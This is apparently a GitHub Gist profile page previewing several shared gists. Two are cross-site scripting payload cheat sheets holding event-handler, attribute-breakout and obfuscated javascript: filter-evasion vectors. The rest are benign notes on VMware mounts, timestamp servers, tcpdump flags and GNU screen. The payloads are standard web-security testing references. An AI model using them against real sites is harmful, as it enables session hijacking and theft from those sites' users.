Skip to content

Instantly share code, notes, and snippets.

View Darkcast's full-sized avatar

Darkcast

29 followers · 20 following
View GitHub Profile
@kurobeats
kurobeats / xss_vectors.txt
Last active May 30, 2025 19:58
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@mgeeky
mgeeky / mount-shared-folders.sh
Created March 13, 2017 11:58
VMware mount shared folders (taken from Kali)
#!/bin/bash
vmware-hgfsclient | while read folder; do
echo "[i] Mounting ${folder} (/mnt/hgfs/${folder})"
mkdir -p "/mnt/hgfs/${folder}"
umount -f "/mnt/hgfs/${folder}" 2>/dev/null
vmhgfs-fuse -o allow_other -o auto_unmount ".host:/${folder}" "/mnt/hgfs/${folder}"
done
sleep 2s
@Manouchehri
Manouchehri / rfc3161.txt
Last active May 28, 2025 18:26
List of free rfc3161 servers.
https://rfc3161.ai.moda
https://rfc3161.ai.moda/adobe
https://rfc3161.ai.moda/microsoft
https://rfc3161.ai.moda/apple
https://rfc3161.ai.moda/any
http://rfc3161.ai.moda
http://timestamp.digicert.com
http://timestamp.globalsign.com/tsa/r6advanced1
http://rfc3161timestamp.globalsign.com/advanced
http://timestamp.sectigo.com
@sapran
sapran / Simple XSS payloads
Last active April 15, 2025 09:29 — forked from funkaoshi/XSS Strings
" onfocus="alert(1)" name="bounty
(Append #bounty to the URL and enjoy your zero interaction XSS )
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
# Internet Explorer, Edge
<svg><script>alert(1)<p>
# Firefox
@tuxfight3r
tuxfight3r / tcp_flags.txt
Last active May 2, 2025 16:54
tcpdump - reading tcp flags
##TCP FLAGS##
Unskilled Attackers Pester Real Security Folks
==============================================
TCPDUMP FLAGS
Unskilled = URG = (Not Displayed in Flag Field, Displayed elsewhere)
Attackers = ACK = (Not Displayed in Flag Field, Displayed elsewhere)
Pester = PSH = [P] (Push Data)
Real = RST = [R] (Reset Connection)
Security = SYN = [S] (Start Connection)
@jctosta
jctosta / screen_cheatsheet.markdown
Last active May 30, 2025 10:57
Screen Cheatsheet

Screen Quick Reference

Basic

Description Command
Start a new session with session name screen -S <session_name>
List running sessions / screens screen -ls
Attach to a running session screen -x
Attach to a running session with name screen -r